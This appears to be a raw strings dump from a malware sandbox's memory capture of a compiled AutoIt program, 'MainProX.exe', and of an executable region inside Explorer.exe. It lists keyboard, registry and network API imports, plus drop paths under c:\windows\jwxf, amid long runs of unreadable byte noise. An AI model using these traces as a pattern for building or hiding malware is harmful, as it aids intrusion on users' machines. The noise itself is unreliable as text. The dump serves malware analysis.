Wrong JPEG library version: library is %d, caller expects %d
Invalid memory pool code %d
Unsupported JPEG data precision %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Invalid progressive parameters at scan script entry %d
Invalid scan script at entry %d
Improper call to JPEG library in state %d
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Buffer passed to JPEG library is too small
Too many color components: %d, max %d
Unsupported color conversion request
Bogus DAC index %d
Bogus DAC value 0x%x
Bogus DHT index %d
Bogus DQT index %d
Empty JPEG image (DNL not supported)
Maximum supported image dimension is %u pixels
Cannot transcode due to multiple use of quantization table %d
Backing store not supported
Huffman table 0xx was not defined
Quantization table 0xx was not defined
Not a JPEG file: starts with 0xx 0xx
Insufficient memory (case %d)
Cannot quantize more than %d color components
Cannot quantize to fewer than %d colors
Cannot quantize to more than %d colors
Unsupported JPEG process: SOF type 0xx
Failed to create temporary file %s
Unsupported marker type 0xx
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unknown APP0 marker (not JFIF), length %u
Unknown APP14 marker (not Adobe), length %u
Define Arithmetic Table 0xx: 0xx
Define Huffman Table 0xx
Define Quantization Table %d precision %d
Define Restart Interval %u
Freed EMS handle %u
Obtained EMS handle %u
= = = = = = = =
JFIF APP0 marker, density %dx%d %d
Warning: thumbnail image size does not match data length %u
Unknown JFIF minor revision number %d.d
with %d x %d thumbnail image
Skipping marker 0xx, length %u
Unexpected marker 0xx
%4u %4u %4u %4u %4u %4u %4u %4u
Quantizing to %d = %d*%d*%d colors
Quantizing to %d colors
Selected %d colors for quantization
At marker 0xx, recovery action %d
RST%d
Smoothing not supported with nonstandard sampling ratios
Start Of Frame 0xx: width=%u, height=%u, components=%d
Component %d: %dhx%dv q=%d
Start Of Scan: %d components
Component %d: dc=%d ac=%d
Ss=%d, Se=%d, Ah=%d, Al=%d
Closed temporary file %s
Opened temporary file %s
Unrecognized component IDs %d %d %d, assuming YCbCr
Freed XMS handle %u
Obtained XMS handle %u
Unknown Adobe color transform code %d
Inconsistent progression sequence for component %d coefficient %d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: found marker 0xx instead of RST%d
%ld%c
688688688
.2688688688688688
.2688688
^['Vc%Xa Tg X_2]m2aj2dj1Zk2gj1]k1_k2ej1Xk2ri3ek4hk1Zj3ik5\e4r\4_o5g[3qc3]]-amNfc8me3e^6`f0Ya7g`1Zf6f`=[d;Zf6h`6WiEmY1Zb1_^FkZ9jY[`>lU2Xj5oXEb[Fj^>lc=n^>lbBlZ@n[5iW?eSEj^Gi^?gUjW=jWAfVmZ>dU
YX.QS
w`zuFraxbKf[Eo_Hl]>}dLf[=u_CbRIqc:oXLcY9hR8iSIeX@gV9iS9iT9iT:hU:hU;iV;jW:lV:jV:lW;iV;lX;kX;kY8kR2bA;n[;iV:jU/a>=mYp^)eZ5gU g[/h]1k\:p_)hb1l`/lb ib4na-jb1lb
b`8jW)ib1l`/j`*qm3pd)pl1ph/ri*h`3na*jd/i]2fV9\R3m_ ib.kc2iW(g`8pc9wp)kg1j^:vk0k`,ja i`1ql)hb4k]
.2*46 13
,0$25'35
03 2:)33!3@ 29,56
u7uh.oj6oe,xv=
/=!3@"3@
09$4> 12
1
04(48#3:(35
19
02 13$24
28L,6@$4D07=
2H_#4E
6jZ.SQ-SS:ign
-0!2?-GR.IT/HS-JT&:Q
.="3B#4H#4K&5I*8P%5G'6K&5I)7N*"3>!3=-7F.7A'4=*6F48?'5C37:&5@ 5
/1/56!24$34
.D#?D*>R)9S/OS.MT-MT3KT.IV)6O,8R
*,8?=99!02
0D_&6J)5M'9S;PdPXsjfnYi|Xrnjl
bdi.HR
467137345
1.II}
P]v.MU 6K,7I(7P):O$:M.CM;FM9@S-4G$:L'8I)5I(7Q.7E08B(6R"3G"3J#3C17C$6L!16*6I,59!4C!/A
`d%d`M
/O4
2O#5N$5M$5Y,CT):] @V,De*9S.LO,D],CK,C] AT AN)6N)7N)6N)6N)6N)5N >O,DP ?P)8N BP,CP)7N-JR*:N ?P)6N)7N)7N)7N)7N(7O*7P&6J
2N!5Q!4P)7S*>f,C] C`*=e,DU*Ad,Ea):W*<_ ap>O-HR.KT ?O)7N,CP =O AP*8N)7N)7N)7N*7O)7N
4W(6L(6a%6^,E_*Ab(7Z,E_ Bc*
3Q'9]Ê);j.Gf,Da*>Y,F](N-KO0H`,DQ.OR.PP,FO,BQ C]*:L,EO)9N @P)8L)6N)6N)7N*7O$5K
5X"5d'9_Ë*=h.Gd B`(8c C` D_)9a A])9` E[*;L)7M,CN)6T);W*8L.KT @`,CZ A[.LN/Da-HN,D[.HY ?N*8_->\-B[,?V @P(7`*>N ?O)6N)7N'7P 3H!3I
2T(6M!7^":n);i/Dm(7](9p,E]*=k*?e BZ Bc A_(6U)T)6U*:N*:N)6N)7N 8O 4M
1Z(>`*@e C`*>h,F](=h ?e D])9i(9d)9^*:])8M)6U)7N(9b*;Y,DO(8Z C`.LT*=Q1Ji.MR2La0L[.MV*@d D] B] @M*8V0Gc'4K*9O)8M)7N)7N)7O%5M
5c 4a*7s(7p-?p Cn!:j);i(9l(8[ Ca D_,E`)9Q)7])6V(6X,CW @R,D`.MS*@d.J_1Ld0L^1Lc/LZ1Le.H^ >c.HS.HW*;c,DQ 9U ?L*
3N$4h"Ek%?k0>r.Cj)=e.Gf ?j*7p*?e)
1W
Kd)f.KY2Lk0L`0L^1Lc0M^/Kc-C`0K_*Ac
Fd <_ d>\/H`(6a*=U*=Y)6Q*7M&6N
5w 4ao"@u
@t&Lu);o%6o%;q'9p(6o*G^*
Lb&;Y ;r.Cm,G\-Bi2Hq1Fp3Kp3Kp3Kp3Kp3Kp3Kp3Kp3Kn1N]2Jr ?i0Gm*
:]'4])8n)6d(:h1Kg0Er1Ip.Bo4Lp3Kp3Kp3Kp3Kp3Kp3Kp2Jp/Dq0Eq.Gc3Mi0C`3Jv ;g*?\,E_)7O(7X-9M
Bv'8q*;i$=k&5g'7l!:`*?c.At0Gp1Hp.Bo4Lp3Kp3Kp3Kp3Jp3Ip3Kp3Jp/Dp5Np/Dq0Gq.Do0Jb-Eh);k*>g(8c*8W"5M
Dv*7n'9n&8n);h'5q-An2Ko2Ip-@o4Lp3Kp3Kp3Jn3Lp3Lp3Kp3Kp1Hp4Mp.Bo0Gp4Lp0Fr0Kd)?e D^):c)7S 8L
9m,C_$=m$=l1Fp1Gp2Ip0Gp3Lp3Kq3Q}3Po4To3Jp2Jp,@o4Lp4Lp0Ep1Hp*
Lc)4q->q3Kp.Bo0Gp/Co4Lp3Kp3Il3Io3Hp3Kp3Kp3Kp1Gp1Gp.Bo2Jp1Ip1Ho/Cs D_.Bf(7e*8V
5]l4Xo3Ip3Kp3Kp3Kp1Hp3Jp0Fp.Co3Jp ?i =\.Ce(6P'6Q
5q%9q%;q)7n(8o%6p(8o'7o ;o,>o4Mp2Ip2Ip3Kp3Kq3Kq3Kn3Lp3Kp4Lp/Dp.Co4Mp,?o3Kp1Hp2Jp1Hq ;j ;_(7b*7J%6N
>v 6q"6p!6p%5o"?t&9p"6p$7p$6p ?u0Jq.Bo5Np/Do1Hp3Ko3Ox3Py4T
3Nu4Lo0Ep0Fo4Mp-@o.Co0Gp2Hp0Ep*A_*?])6b 4U
5q)8o(8o-Eq,@o5Mp-Bo1Gp3Ko3Nu3Nv3Il3Kp4Lp/Dp-Bo4Lp2Ip-Bo/Ep.Bp3Kp-@o.Cm(9k*7U$6N
6q'8o*8n0Fp6Mo/Bn G}3Lr3Im4R}3Pz3Jn3Kp4Lp0Eo,?o2Ip,@o1Gp/Do1Hp-Aq.Dm*=`)6P 5M
6q&7o-;n)Lt,Lr/K|3Lr3Jn4S~3Pz3Jn3Kp3Lp0Fp,@o2Ip-@o1Hp/Do1Hp.Ap.Dm*=^(7b
3r!6p&7p%9q Hv0Kq/Kr4Jn,?o3Kn3Ox3Nu3Ko3Kp4Mp,>o,@p3Kp.Cp/Do1Ip2Ip/Fq*;g(6])7]#6P
2Jo3Ko4Lo2Ip,?o*o3Jp.Bp(6b*7M
2Jr2Kr0Lx.Cn.Cp*o2Hp
=s'Js-E}0Ku(A|6Lj.J{1Kt.J|0Jv-J~6On ;o(9o2Jp*;o0Dp*
6,{6.|4(~3#
,J~0Jv1Js.Jz4Lp0En0Ep =o):o3Lp*
4p,>p.Jq'I
(>x(7m*
1Ks0Lx0Cl/Bm)9o*:o*;o'6o.Ap);o =p(7k)8P
3o.Du(E
3Lr,Bt'o.Cp*
.Hx(A{$A
,Ez.Hy J
-Du.Fw)=s&>|%7p#6p)8o(8o(8o(8o(8r*8T
-K}&G
%6s%6u'7r)8o(8o'6o(6p
QGxG=zI?xD;u
F=}8.wC:
5 |5,~5,
5 |5,~5 {-
6 v1%x0
7-~5,|5,
Z%%U(&O
s- r5/q4,r5-l0%c
>3v6-t4 r0%d(
8-x7.yB8~3*|@7
Gv*@o.Ls Lw*Mt
0Ix)Lu Lw2Lr.Ok/Jo.Nk.Is/Jr
4g"6no(6t
!4 "6 !3
#5!#8#'6 !/
HHHsssHHH]]]
88{88{88{88{88{\\
1.130303.393
{8856F961-340A-11D0-A96B-00C04FD705A2}
MainProX.exe_600:
`.rsrc
\.ptx|x
PSSSSSSh
Gt.Ht$
PSSSh@
PVSSh@
f;Crt
?#%X.y
GetProcessWindowStation
operator
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.
kernel32.dll
oleaut32.dll
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
zcÃ
.zV:b
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
GetCPInfo
RegDeleteKeyW
RegEnumKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
SetViewportOrgEx
ShellExecuteExW
SHFileOperationW
ShellExecuteW
RegisterHotKey
GetKeyboardLayoutNameW
ExitWindowsEx
EnumThreadWindows
UnregisterHotKey
keybd_event
GetAsyncKeyState
SetKeyboardState
GetKeyboardState
GetKeyState
VkKeyScanW
EnumWindows
EnumChildWindows
MapVirtualKeyW
CloseWindowStation
SetProcessWindowStation
OpenWindowStationW
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
##@,&,//,))
.jQE2
4`%ud*
3(-,'')-*/%'
9(***3).**-)'
H%d=j@
0!;....(
.text
`.rdata
@.data
.rsrc
@.reloc
p21jj(%fo0.Kl,(Eq32]d
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
IPHLPAPI.DLL
MPR.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
SHELL32.dll
USER32.dll
USERENV.dll
UxTheme.dll
VERSION.dll
WININET.dll
WINMM.dll
WSOCK32.dll
mscoree.dll
combase.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
>>>AUTOIT NO CMDEXECUTE
CMDLINERAW
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
APPSKEY
789:;?
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDelay
SendKeyDownDelay
TCPTimeout
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
D%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 9, 21
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
c:\windows\jwxf\MainProX.exe
%WinDir%\jwxf\MainProX.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
MainProX.exe_600_rwx_00401000_000DF000:
PSSSSSSh
Gt.Ht$
PSSSh@
PVSSh@
f;Crt
?#%X.y
GetProcessWindowStation
operator
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.
kernel32.dll
oleaut32.dll
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
zcÃ
.zV:b
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
GetCPInfo
RegDeleteKeyW
RegEnumKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
SetViewportOrgEx
ShellExecuteExW
SHFileOperationW
ShellExecuteW
RegisterHotKey
GetKeyboardLayoutNameW
ExitWindowsEx
EnumThreadWindows
UnregisterHotKey
keybd_event
GetAsyncKeyState
SetKeyboardState
GetKeyboardState
GetKeyState
VkKeyScanW
EnumWindows
EnumChildWindows
MapVirtualKeyW
CloseWindowStation
SetProcessWindowStation
OpenWindowStationW
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
##@,&,//,))
.jQE2
4`%ud*
3(-,'')-*/%'
9(***3).**-)'
H%d=j@
0!;....(
.text
`.rdata
@.data
.rsrc
@.reloc
mscoree.dll
combase.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
>>>AUTOIT NO CMDEXECUTE
CMDLINERAW
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
APPSKEY
789:;?
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDelay
SendKeyDownDelay
TCPTimeout
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
D%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 9, 21
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
c:\windows\jwxf\MainProX.exe
%WinDir%\jwxf\MainProX.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
Explorer.EXE_880_rwx_014E0000_00004000:
c:\windows\jwxf\YP.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW